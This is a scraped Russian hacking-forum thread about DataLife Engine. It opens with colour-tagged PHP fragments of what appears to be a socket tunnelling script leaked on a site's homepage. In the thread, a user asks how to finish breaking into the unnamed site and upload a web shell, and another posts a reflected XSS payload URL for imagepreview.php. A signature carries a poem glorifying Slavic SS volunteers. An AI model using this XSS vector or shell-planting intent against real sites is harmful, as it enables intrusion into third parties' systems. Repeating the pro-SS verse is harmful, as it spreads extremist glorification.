fwrite([/COLOR][COLOR="#0000BB"]$fsok[/COLOR][COLOR="#DD0000"],[/COLOR][COLOR="#0000BB"]$wbuffer[/COLOR][COLOR="#DD0000"]); } } fflush([/COLOR][COLOR="#0000BB"]$fsok[/COLOR][COLOR="#DD0000"]); while ([/COLOR][COLOR="#0000BB"]$rbuffer[/COLOR][COLOR="#DD0000"]= fread([/COLOR][COLOR="#0000BB"]$fsok[/COLOR][COLOR="#DD0000"],[/COLOR][COLOR="#0000BB"]$sBuffLen[/COLOR][COLOR="#DD0000"])) { if (vpsp_enc) { echo VC_Encrypt([/COLOR][COLOR="#0000BB"]$rbuffer[/COLOR][COLOR="#DD0000"]); } else { echo[/COLOR][COLOR="#0000BB"]$rbuffer[/COLOR][COLOR="#DD0000"]; } } fflush([/COLOR][COLOR="#0000BB"]$fsok[/COLOR][COLOR="#DD0000"]); fclose([/COLOR][COLOR="#0000BB"]$fsok[/COLOR][COLOR="#DD0000"]); exit; } function MD5Hash([/COLOR][COLOR="#0000BB"]$str[/COLOR][COLOR="#DD0000"]) {[/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#DD0000"]= md5([/COLOR][COLOR="#0000BB"]$str[/COLOR][COLOR="#DD0000"]);[/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#DD0000"]= ''; foreach(explode("[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]n[/COLOR][COLOR="#DD0000"]", trim(chunk_split([/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#DD0000"], 2))) as[/COLOR][COLOR="#0000BB"]$h[/COLOR][COLOR="#DD0000"]) {[/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#DD0000"].= chr(hexdec([/COLOR][COLOR="#0000BB"]$h[/COLOR][COLOR="#DD0000"])); } return[/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#DD0000"]; } function VC_Init([/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#DD0000"],[/COLOR][COLOR="#0000BB"]$ks[/COLOR][COLOR="#DD0000"]) {[/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#DD0000"]= range(0, 255); if (strlen([/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#DD0000"]) == 0) { return[/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#DD0000"]; }[/COLOR][COLOR="#0000BB"]$km[/COLOR][COLOR="#DD0000"]= MD5Hash([/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#DD0000"]);[/COLOR][COLOR="#0000BB"]$kx[/COLOR][COLOR="#DD0000"]= ''; for ([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#DD0000"]= 0;[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#DD0000"]Datalife Engine not installed. Please run install.php[/COLOR][/COLOR]
что можно из этого взять и можно ли доломать этот сайт и залить шелл? тиц сайта 50, может еще там есть вкусные домены, кто может помочь, желательно в личку что бы не разводить флуд?
Что за сайт пока не скажу, посмотрю живая ли тема и есть ли реальные мысли |
|
|
|
03.06.2013, 19:36
|
|
Постоянный
Регистрация: 06.01.2012
Сообщений: 913
С нами:
7552406
Репутация:
724
|
|
Martyn911, судя по всему уже кто-то пытается воткнуть какой-то код ))
Если посмотрите на вывод, обнаружите code execution.
|
|
|
|
18.06.2013, 00:02
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами:
9030566
Репутация:
2017
|
|
Ответ:удалились
Решение: /threadedpost3522832.html Задай вопрос тут
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|
|
17.07.2013, 21:25
|
|
Новичок
Регистрация: 14.07.2013
Сообщений: 9
С нами:
6753206
Репутация:
0
|
|
Нашел пассивную XSS.
Код:
http://target.com/engine/modules/imagepreview.php?image=\x27\x3E[XSS]
Заменяем все специальные символы на \x[HEX код символа].
Работает по крайней мере на 9.8 + MQ=off, подробностей точно не знаю. |
|
|
|
12.08.2013, 16:33
|
|
Новичок
Регистрация: 03.08.2013
Сообщений: 1
С нами:
6724406
Репутация:
0
|
|
Сообщение от Martyn911
Здравствуйте, есть дле сайт, при заходе на главнуюю выводит такое
что можно из этого взять и можно ли доломать этот сайт и залить шелл? тиц сайта 50, может еще там есть вкусные домены, кто может помочь, желательно в личку что бы не разводить флуд?
Что за сайт пока не скажу, посмотрю живая ли тема и есть ли реальные мысли
А что вы хотите из этого получить? Завтра снесут эту гадость и поставят что-то новое...
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
